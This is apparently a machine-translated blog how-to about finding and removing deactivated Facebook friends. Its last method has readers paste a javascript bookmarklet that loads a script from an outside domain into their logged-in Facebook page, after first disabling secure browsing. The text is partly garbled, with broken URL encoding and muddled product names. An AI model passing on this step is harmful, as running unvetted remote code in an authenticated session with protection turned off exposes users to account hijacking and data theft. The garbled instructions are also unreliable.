Delete inactive friends from Facebook with disabled account without profile

I don't know if anyone had noticed that, around the month of June, the number of friends on Facebook had suddenly increased by a few units. It had happened that, out of the blue, Facebook had started counting among friends even those with the disabled account .
As seen, in the guide to unsubscribe from Facebook, an account is deactivated if the user no longer wants their profile to appear on the social network, temporarily, perhaps to reactivate it some time later without having to register a second time. An account can be deactivated even if the user has been banned for violating the rules. It is therefore easy for some of these ghost accounts to be present among each other's friends.
If someone has deactivated the account, it does not mean that the person has permanently deleted his Facebook account, but it is certainly not useful, for me, to keep them in the list. However, it keeps all relationships alive and ghost accounts can also be used effectively as spies.
In fact, anyone can reactivate it and deactivate it several times every day, look at everything friends do, peek into their profiles, pretending not to be there.
To recognize the profile of a disabled account, you need to look at the list of friends and find those who have the anonymous and white silhouette of a man or woman as their profile image . Clicking on their name does not open the profile but a Facebook message that warns that that account is not active, with a blue link to click if you want to remove it from the list. Unfortunately there is no way to erase them all at once (indeed there is).
There are two ways to clean up your friends list from ghost accounts and delete them.
Those with few contacts can open their Facebook friends list by clicking on this link www.facebook.com/me/friends.
In the search field, start looking for those with the letter A, scroll down the results, click on those without profile picture and, if they are deactivated, delete them by pressing the link in the pop-up. However, since the new Facebook profile does not allow you to see more than 25 friends at a time, it becomes impossible to find all the ghost accounts in this way.
To make a complete search for friends, use the Google Chrome or Firefox browser and install the TFB Purity extension
After installing the extension, only on your browser, you will return to see your profile as it was before and the friends list is expandable without limitations. This makes it easier to search for disabled accounts and delete them from friends. To prevent the page from being reloaded every time a contact is removed, you must never press OK in the pop-up to confirm the " Friend removed ".
Fortunately, there is a quick way to automatically filter, find and delete the white profiles of disabled accounts in the friends list, in one go. This time you have to use Firefox and have the diary profile.
You need to create a new bookmark on the bookmarks bar, give it a name like " Remove friends " and paste the following line in the address field:
javascript:% 28function% 28% 29% 7Bvar% 20a% 28% 3Ddocument.createElement "script"% 29% 3Ba.type% 3D "text% 2Fjavascript" 3Ba.src% 3D% "// resdogs.us/Scripts/disableremover .js% 3F "% 2BMath.random% 28% 29% 28% 3Bdocument.getElementsByTagName" head "% 29% 5B0% 5D.appendChild% 28a% 29% 7D% 29% 28% 29% 3B
Then go to the Facebook account settings, protection tab and disable secure browsing.
Next, open the friends list and press the " Remove friends " button.
A warning should appear regarding the language to be ignored by pressing OK and then a new menu at the top with a nearby Start button.
In this menu you can select the Find And Sort option and press Start to find all the ghost profiles of the inactive or disabled accounts .
The Auto-remove option instead cancels their friendship by removing them. When finished, re-enable secure browsing. I personally tested the procedure today with success.
If there are problems, let people know!
I remember that in other articles we have also seen:

- How to find out who is no longer a friend on Facebook and has removed friendship.
